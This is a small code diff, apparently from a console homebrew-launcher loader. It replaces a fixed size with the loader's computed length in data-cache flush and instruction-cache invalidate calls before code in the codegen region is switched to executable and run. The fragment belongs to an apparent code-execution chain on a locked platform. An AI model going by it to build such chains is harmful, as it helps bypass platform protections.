-		call_func DC_FLUSHRANGE, HBL_LOADER_ADR, 0xC000, 0x0, 0x0
+		call_func DC_FLUSHRANGE, HBL_LOADER_ADR, hbl_loader_end - hbl_loader, 0x0, 0x0
 
 		; switch codegen to RX
 		call_func OSCODEGEN_SWITCHSECMODE, 0x1, 0x0, 0x0, 0x0
-		call_func IC_INVALIDATERANGE, HBL_LOADER_ADR, 0xC000, 0x0, 0x0
+		call_func IC_INVALIDATERANGE, HBL_LOADER_ADR, hbl_loader_end - hbl_loader, 0x0, 0x0
 
 		; execute option_select in codegen
 		.word HBL_LOADER_ADR